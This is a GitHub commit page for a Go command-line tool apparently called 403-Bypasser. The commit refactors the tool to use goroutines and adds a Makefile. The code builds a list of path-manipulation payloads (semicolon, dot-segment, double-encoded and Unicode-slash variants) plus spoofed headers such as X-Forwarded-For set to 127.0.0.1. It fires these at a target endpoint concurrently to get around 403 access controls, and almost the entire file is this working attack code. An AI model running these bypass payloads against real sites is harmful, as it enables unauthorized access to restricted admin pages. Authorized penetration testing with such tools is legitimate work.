Merge pull request #1 from ClavinJune/main

Improve Code, Add Goroutine
main
Muhammad Daffa 2021-07-18 19:52:23 +07:00 committed by GitHub
commit 9c1edf9fc7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 125 additions and 73 deletions

2
Makefile Normal file
View File

@ -0,0 +1,2 @@
fmt:
@gofmt -w -s main.go && goimports -w main.go && go vet main.go

196
main.go
View File

@ -1,46 +1,21 @@
package main
import (
"context"
"flag"
"fmt"
"log"
"net/http"
"os"
"regexp"
"runtime"
"strings"
"sync"
"time"
)
var Red = "\033[31m"
var Green = "\033[32m"
var White = "\033[97m"
func main() {
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
path := flag.String("path", "", "An endpoint. Example: admin")
flag.Parse()
if *domain == "" || *path == "" {
log.Fatalln("Using flag -url and -path")
os.Exit(0)
}
upperCase := strings.ToUpper(*path)
endpoint := []string{
*domain + "/" + upperCase,
*domain + "/" + *path + "/",
*domain + "/" + *path + "/.",
*domain + "//" + *path + "//",
*domain + "/./" + *path + "/./",
*domain + "/./" + *path + "/..",
*domain + "/;/" + *path,
*domain + "/.;/" + *path,
*domain + "//;//" + *path,
*domain + "/" + *path + "..;/",
*domain + "/%2e/" + *path,
*domain + "/%252e/" + *path,
*domain + "/%ef%bc%8f" + *path}
headers := []string{
var (
reURL = regexp.MustCompile("^https?://")
headerPayloads = []string{
"X-Custom-IP-Authorization",
"X-Originating-IP",
"X-Forwarded-For",
@ -49,52 +24,127 @@ func main() {
"X-Host",
"X-Forwarded-Host",
"X-ProxyUser-Ip",
"X-Remote-Addr"}
"X-Remote-Addr",
}
)
fmt.Println(Green, " _ _ ___ ____ ____ ")
fmt.Println(Green, "| || | / _ \\___ \\ | _ \\ ")
fmt.Println(Green, "| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __ ")
fmt.Println(Green, "|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__| ")
fmt.Println(Green, " | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ | ")
fmt.Println(Green, " |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_| ")
fmt.Println(Green, " __/ | | ")
fmt.Println(Green, " |___/|_| v1.0.2", White)
const (
version string = "v1.1.0"
red string = "\033[31m"
green string = "\033[32m"
white string = "\033[97m"
fmt.Println("\nDomain:", *domain)
fmt.Println("Path:", *path)
headerValue string = "127.0.0.1"
)
fmt.Println("\nNormal Request")
for i, str := range endpoint {
req, err := http.Get(str)
if err != nil {
log.Fatal(err)
}
output := fmt.Sprintf("%s %d %s", str, req.StatusCode, http.StatusText(req.StatusCode))
if req.StatusCode == 200 {
fmt.Println(Green, i+1, output, White)
} else {
fmt.Println(Red, i+1, output, White)
}
func showBanner() {
fmt.Printf("%s %s %s %s %s %s %s %s %s %s %s\n", green,
" _ _ ___ ____ ____\n",
"| || | / _ \\___ \\ | _ \\\n",
"| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __\n",
"|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__|\n",
" | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ |\n",
" |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_|\n",
" __/ | |\n",
" |___/|_| ",
version, white)
}
func getValidDomain(domain string) string {
trimmedDomain := strings.TrimSpace(domain)
if !reURL.MatchString(trimmedDomain) {
trimmedDomain = "https://" + trimmedDomain
}
fmt.Println("\nRequest with Headers")
for j, head := range headers {
req2, err := http.NewRequest("GET", *domain+"/"+*path, nil)
if err != nil {
log.Fatal(err)
}
req2.Header.Set(head, "127.0.0.1")
resp, err := http.DefaultClient.Do(req2)
if err != nil {
log.Fatal(err)
}
output2 := fmt.Sprintf("%s %s %d %s", head, *domain+"/"+*path, resp.StatusCode, http.StatusText(resp.StatusCode))
return trimmedDomain
}
if resp.StatusCode == 200 {
fmt.Println(Green, j+1, output2, White)
} else {
fmt.Println(Red, j+1, output2, White)
}
func constructEndpointPayloads(domain, path string) []string {
return []string{
domain + "/" + strings.ToUpper(path),
domain + "/" + path + "/",
domain + "/" + path + "/.",
domain + "//" + path + "//",
domain + "/./" + path + "/./",
domain + "/./" + path + "/..",
domain + "/;/" + path,
domain + "/.;/" + path,
domain + "//;//" + path,
domain + "/" + path + "..;/",
domain + "/%2e/" + path,
domain + "/%252e/" + path,
domain + "/%ef%bc%8f" + path,
}
}
func penetrateEndpoint(wg *sync.WaitGroup, url string, header ...string) {
ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
defer cancel()
defer wg.Done()
req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
if err != nil {
log.Fatal(err)
}
var h string
if header != nil {
h = header[0]
req.Header.Set(h, headerValue)
}
resp, err := http.DefaultClient.Do(req)
if err != nil {
log.Fatal(err)
}
defer resp.Body.Close()
color := green
if resp.StatusCode != 200 {
color = red
}
log.Println(color, h, url, resp.StatusCode, http.StatusText(resp.StatusCode), white)
}
func main() {
runtime.GOMAXPROCS(1)
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
path := flag.String("path", "", "An endpoint. Example: admin")
flag.Parse()
if *domain == "" || *path == "" {
log.Fatalln("Using flag -url and -path")
}
validDomain := getValidDomain(*domain)
validPath := strings.TrimSpace(*path)
endpoints := constructEndpointPayloads(validDomain, validPath)
showBanner()
fmt.Println("\nDomain:", validDomain)
fmt.Println("Path:", validPath)
fmt.Println("\nNormal Request")
var wg sync.WaitGroup
wg.Add(len(endpoints))
for _, e := range endpoints {
go penetrateEndpoint(&wg, e)
}
wg.Wait()
fmt.Println("\nRequest with Headers")
wg.Add(len(headerPayloads))
for _, h := range headerPayloads {
go penetrateEndpoint(&wg, validDomain+"/"+validPath, h)
}
wg.Wait()
}